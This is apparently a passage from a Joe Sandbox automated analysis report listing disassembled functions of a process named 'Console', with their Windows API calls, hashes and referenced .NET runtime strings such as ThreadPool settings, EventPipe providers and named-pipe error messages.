                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite_swprintfstrlen
                                                                                                                                                                                                                          • String ID: %-30s %d$%-30s %zu$cache_load:%zu used, %zu total, utilization %#5.2f%%$stub data$cache_entry_counter$cache_entry_space$cache_entry_used$site_counter$site_write$site_write_mono$site_write_poly$stub_lookup_counter$stub_mono_counter$stub_poly_counter$stub_space
                                                                                                                                                                                                                          • API String ID: 1354552572-2971453786
                                                                                                                                                                                                                          • Opcode ID: f7d243bafac8af75b7784f64c1fb35537d8a2414da801e393f3b7bb8abc7e660
                                                                                                                                                                                                                          • Instruction ID: 39cef180e41fb53114e2c9f8bdd2da49414ef9eb550ca4d12e16b0ef5696fc8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7d243bafac8af75b7784f64c1fb35537d8a2414da801e393f3b7bb8abc7e660
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F149B2504308AFD710CF58DC4AF8B77A8FB08705F04457EF64ADA252E772A929CB52
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0163EF10,7CAB6A82,?,?,0000002C), ref: 010BD946
                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 010BD981
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.WavePeriod, xrefs: 010BDABF
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.SampleIntervalHigh, xrefs: 010BDC61
                                                                                                                                                                                                                          • System.Threading.ThreadPool.MaxThreads, xrefs: 010BDA01
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.WaveMagnitudeMultiplier, xrefs: 010BDB31
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.TargetSignalToNoiseRatio, xrefs: 010BDAE5
                                                                                                                                                                                                                          • System.Threading.ThreadPool.DisableStarvationDetection, xrefs: 010BDA27
                                                                                                                                                                                                                          • System.Threading.ThreadPool.DebugBreakOnWorkerStarvation, xrefs: 010BDA4D
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.Disable, xrefs: 010BDA99
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.MaxSampleErrorPercent, xrefs: 010BDC15
                                                                                                                                                                                                                          • System.Threading.ThreadPool.UnfairSemaphoreSpinLimit, xrefs: 010BDA73
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.MaxWaveMagnitude, xrefs: 010BDB57
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.MaxChangePerSecond, xrefs: 010BDBC9
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.WaveHistorySize, xrefs: 010BDB7D
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.Bias, xrefs: 010BDBA3
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.SampleIntervalLow, xrefs: 010BDC3B
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.MaxChangePerSample, xrefs: 010BDBEF
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.GainExponent, xrefs: 010BDC87
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.ErrorSmoothingFactor, xrefs: 010BDB0B
                                                                                                                                                                                                                          • System.Threading.ThreadPool.MinThreads, xrefs: 010BD9DB
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                          • String ID: System.Threading.ThreadPool.DebugBreakOnWorkerStarvation$System.Threading.ThreadPool.DisableStarvationDetection$System.Threading.ThreadPool.HillClimbing.Bias$System.Threading.ThreadPool.HillClimbing.Disable$System.Threading.ThreadPool.HillClimbing.ErrorSmoothingFactor$System.Threading.ThreadPool.HillClimbing.GainExponent$System.Threading.ThreadPool.HillClimbing.MaxChangePerSample$System.Threading.ThreadPool.HillClimbing.MaxChangePerSecond$System.Threading.ThreadPool.HillClimbing.MaxSampleErrorPercent$System.Threading.ThreadPool.HillClimbing.MaxWaveMagnitude$System.Threading.ThreadPool.HillClimbing.SampleIntervalHigh$System.Threading.ThreadPool.HillClimbing.SampleIntervalLow$System.Threading.ThreadPool.HillClimbing.TargetSignalToNoiseRatio$System.Threading.ThreadPool.HillClimbing.WaveHistorySize$System.Threading.ThreadPool.HillClimbing.WaveMagnitudeMultiplier$System.Threading.ThreadPool.HillClimbing.WavePeriod$System.Threading.ThreadPool.MaxThreads$System.Threading.ThreadPool.MinThreads$System.Threading.ThreadPool.UnfairSemaphoreSpinLimit
                                                                                                                                                                                                                          • API String ID: 3094578987-3657790599
                                                                                                                                                                                                                          • Opcode ID: 1a84b781b15898e48cd8eefa026b1830c0edac1e9d7fbf27b5df86902f49a325
                                                                                                                                                                                                                          • Instruction ID: 976ee69b63416014de597b5babc199e80968668caddeebfdb84ab0f01b2675f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a84b781b15898e48cd8eefa026b1830c0edac1e9d7fbf27b5df86902f49a325
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08A1C83279020956D760EE8AFC81BE8F760FBA1725F5042BAFAD4AF2C0D7725516C790
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,01074E71,0159CDF8,?,00000100,?,?), ref: 010746EA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000100,?,?), ref: 01074741
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000100,?,?,?,00000100,?,?), ref: 01074763
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeapstrcpy_sstrlen
                                                                                                                                                                                                                          • String ID: **UNKNOWN TYPE**$Boolean$Byte$Char$Double$Int16$Int32$Int64$SByte$Single$System.String$UInt16$UInt32$UInt64$Void
                                                                                                                                                                                                                          • API String ID: 2476811093-2821386802
                                                                                                                                                                                                                          • Opcode ID: 8c13a29e3c1981e9b0e897f8cb60049a7fbcb48b439df3b14bdf6504f5893e0c
                                                                                                                                                                                                                          • Instruction ID: 3a3682576f26f5d4b5b02a4431fe2df210debb66791ac7fc1138429dbc9b61bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c13a29e3c1981e9b0e897f8cb60049a7fbcb48b439df3b14bdf6504f5893e0c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7241A271E00209EBDB14DF55DC829BDF7A4FB45600F50466AEAD6E7210FB70AE20CB96
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,00000010,00000000,?,00000000), ref: 012CE186
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012CE195
                                                                                                                                                                                                                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A,00000000,?,00000000), ref: 012CE1CF
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012CE1DC
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,00000000,00000000,?,00000000), ref: 012CE21F
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,012CDEB4,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 012CE2AA
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,012CDEB4,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 012CE2BB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,012CDEB4,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 012CE2D7
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntime,00000000,?,00000000), ref: 012CE326
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimePrivate,C14FCCBD,00000004,00000005,00000000), ref: 012CE348
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-DotNETCore-SampleProfiler,4002000B,00000000,00000005,00000000), ref: 012CE36B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-DotNETCore-SampleProfiler, xrefs: 012CE366
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimeRundown, xrefs: 012CE21A
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntime, xrefs: 012CE321
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimePrivate, xrefs: 012CE343
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$_strdup$FreeHeapstrcmpstrtoulstrtoull
                                                                                                                                                                                                                          • String ID: Microsoft-DotNETCore-SampleProfiler$Microsoft-Windows-DotNETRuntime$Microsoft-Windows-DotNETRuntimePrivate$Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 1615690062-209705412
                                                                                                                                                                                                                          • Opcode ID: 18e13fd0bdb3b2e74c12eb946b985f76e2ca1ea6e56853b4e05ed191f4624d4c
                                                                                                                                                                                                                          • Instruction ID: cd0c13341c862271269fa0ba60c40d68d42ead92c33a20777bb5653660d73b4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18e13fd0bdb3b2e74c12eb946b985f76e2ca1ea6e56853b4e05ed191f4624d4c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C91AE70E102169FEB20CFA8DC45BAEBFB1AF45B10F15026DEB51BB391D7B099118B91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,Function_00317170,?,?,01252334,Function_00317170), ref: 01252519
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,01252334,Function_00317170), ref: 01252534
                                                                                                                                                                                                                          • DisconnectNamedPipe.KERNEL32(?,00000000,Function_00317170,?,?,01252334,Function_00317170), ref: 01252583
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,01252334,Function_00317170), ref: 01252592
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,Function_00317170,?,?,01252334,Function_00317170), ref: 012525AE
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,01252334,Function_00317170), ref: 012525BD
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,Function_00317170,?,?,01252334,Function_00317170), ref: 012525E9
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,01252334,Function_00317170), ref: 012525F8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Closing without cleaning underlying handles, xrefs: 01252558
                                                                                                                                                                                                                          • Failed to disconnect NamedPipe, xrefs: 01252599
                                                                                                                                                                                                                          • Failed to IPC ownership sentinel handle, xrefs: 0125253B
                                                                                                                                                                                                                          • Failed to close pipe handle, xrefs: 012525C4
                                                                                                                                                                                                                          • Failed to close overlap event handle, xrefs: 012525FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CloseHandle$DisconnectNamedPipe
                                                                                                                                                                                                                          • String ID: Closing without cleaning underlying handles$Failed to IPC ownership sentinel handle$Failed to close overlap event handle$Failed to close pipe handle$Failed to disconnect NamedPipe
                                                                                                                                                                                                                          • API String ID: 3346832071-3329839343
                                                                                                                                                                                                                          • Opcode ID: fbd3b932134b12ecc9a4ceb8c8dc5438960a6b5a4d0fa37ee2d6d2735065a1b7
                                                                                                                                                                                                                          • Instruction ID: cb36f431114305e79abeb619618bf1b929213421011b6a7c647700ba7389d74b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbd3b932134b12ecc9a4ceb8c8dc5438960a6b5a4d0fa37ee2d6d2735065a1b7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B31B071601712EBD32C1B6DE89C6E9BB14FB00726F110309FB26E62F4CB7198618BE1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 012D2B08
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000070,00000000,00000000,00000000), ref: 012D2B20
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012D2BAD
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,000000F0), ref: 012D2BCD
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00019000,?), ref: 012D2C2D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012D2C43
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00019000,?), ref: 012D2C8F
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,000000F0,?,00019000,?), ref: 012D2CB6
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00019000,?), ref: 012D2D70
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,0000002C,?,?,?,?,?,?,?,?,?,?,00019000,?), ref: 012D2D88
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 012D2E42
                                                                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 012D2E97
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 012D2EC4
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 012D2EE3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$Alloc$FreeSystem$AllocateCurrentFrequencyInfoPerformanceQueryTime
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3274788086-0
                                                                                                                                                                                                                          • Opcode ID: 4f7d43d35e5f47808939e85e7f44a308da3dea3d52ee766e8a145053699ea6d0
                                                                                                                                                                                                                          • Instruction ID: 3da719262d81213d09226ca92fcffac599869f424bc359d6ba177e0539625ab8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f7d43d35e5f47808939e85e7f44a308da3dea3d52ee766e8a145053699ea6d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9D1AEB0A10742EFE721DF69C94476ABBF4BF18701F00452DEA46AB790EBB4E454CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,CommandLine,000000FF,00000000,00000000,00000000,00000000,00000004,00000000), ref: 012D24C0
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D24D0
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,CommandLine,000000FF,00000000,?), ref: 012D24F0
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D24FB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,012CE6D8,00000004,00000000), ref: 012D260A
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D2618
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D2626
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D2637
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D2645
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$ByteCharMultiWide$FreeHeapmalloc
                                                                                                                                                                                                                          • String ID: ArchInformation$CommandLine$Microsoft-DotNETCore-EventPipe$OSInformation$ProcessInfo
                                                                                                                                                                                                                          • API String ID: 897903226-198322117
                                                                                                                                                                                                                          • Opcode ID: d1f14b7a29a55868a2e6a71712c7541960a811b7ee2dbc9c189ece54c45474bf
                                                                                                                                                                                                                          • Instruction ID: 83fa78ca9d4364067a5e6dd10ed933305dc21ed81785e8ea3d91b4d159fef084
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1f14b7a29a55868a2e6a71712c7541960a811b7ee2dbc9c189ece54c45474bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A51C1B0E10216ABEB149FA9DC55BAEBBB5FF00300F10442CEA15F7390EB74D9108B94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0141AE4B
                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0141AE9C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0141AEB1
                                                                                                                                                                                                                          • MapViewOfFileEx.KERNEL32(00000000,00000004,?,?,?,00000000), ref: 0141AF07
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000024), ref: 0141AF20
                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,?,?,00000000), ref: 0141AF5C
                                                                                                                                                                                                                            • Part of subcall function 01128840: GetFileSize.KERNEL32(?,00000006,0000002C,?,0141AE3C), ref: 01128848
                                                                                                                                                                                                                            • Part of subcall function 01128840: GetLastError.KERNEL32 ref: 01128855
                                                                                                                                                                                                                            • Part of subcall function 01128840: SetLastError.KERNEL32(00000008), ref: 01128868
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 0141B00D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 0141B030
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 0141B056
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 0141B0A4
                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 0141B0B0
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(0000002C,7CAB6A82,00000000,0000002C), ref: 0141B11A
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,7CAB6A82,00000000,0000002C), ref: 0141B13D
                                                                                                                                                                                                                            • Part of subcall function 01465DD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,0000002C,00000000,?,0141B09A,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 01465E5C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ErrorLast$CloseHandleView$Unmap$CreateMapping$Sizefree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2050550979-0
                                                                                                                                                                                                                          • Opcode ID: 8e1fade171bab02f9681f3bc4950a7b90bded6a38ccce5b6ee010db101174d04
                                                                                                                                                                                                                          • Instruction ID: 0d6c4f961db74e55319ee481fc55f3ea6f8acdf161b3a6ec15f30b4386171dbf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e1fade171bab02f9681f3bc4950a7b90bded6a38ccce5b6ee010db101174d04
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0D16BB4A002059FEB24CFA9C948B9EBFF5FF48314F14825EE915AB3A4D7759940CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD62A
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00000000,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD666
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03BF100E,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,012CDA55,?), ref: 012CD688
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD69A
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03BF100E,000000FF,00000000,?,00000000,00000000,?,?,?,?,012CDA55,?,?,7CAB6A82), ref: 012CD6BB
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD6C6
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(7CAB6A82,00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD6E1
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD704
                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD752
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,Microsoft-Windows-DotNETRuntimeRundown,?,00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD7CD
                                                                                                                                                                                                                            • Part of subcall function 012D4F50: QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,012CD78E,?,00000000,?,?,?,?,012CDA55), ref: 012D4F7F
                                                                                                                                                                                                                            • Part of subcall function 0107CB60: SleepEx.KERNEL32(00000001,00000000,?,?,012CD070), ref: 0107CBD2
                                                                                                                                                                                                                            • Part of subcall function 0107CB60: SwitchToThread.KERNEL32(00000000,00000111,00000000,?,?,012CD070), ref: 0107CBD8
                                                                                                                                                                                                                            • Part of subcall function 012CFA90: QueryPerformanceCounter.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,012CFE6A), ref: 012CFACE
                                                                                                                                                                                                                            • Part of subcall function 012D3570: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 012D3642
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharCounterFreeMultiPerformanceQueryWidefreestrcmp$CommandEventHeapLibraryLineSleepSwitchThreadmalloc
                                                                                                                                                                                                                          • String ID: Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 3870175671-930870680
                                                                                                                                                                                                                          • Opcode ID: 7dd38cdbf0fdead73a78d57ff867ebc0aca3417f59a787740c6db1b4a4db51df
                                                                                                                                                                                                                          • Instruction ID: 8784c73ed91b5c889a0eb0b9a7454de581f4f9a58e4cbbbdb07ef1cf113e2be0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dd38cdbf0fdead73a78d57ff867ebc0aca3417f59a787740c6db1b4a4db51df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45B118746102169FEB28DFA9EC4076A7BA1FF54B01F14423CDB09AB398DB70A854CBD0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,7CAB6A82,00000080), ref: 010A0266
                                                                                                                                                                                                                          • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0159E428,?,0159EFD4,00000000), ref: 010A02A4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010A02CF
                                                                                                                                                                                                                          • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(Ready to Run not enabled.,00000000), ref: 010A02EE
                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 010A02F5
                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,7CAB6A82,00000080), ref: 010A0318
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,7CAB6A82,00000080), ref: 010A034A
                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,%s: "%s".,?,?,0164A1AC,7CAB6A82,00000080), ref: 010A03A9
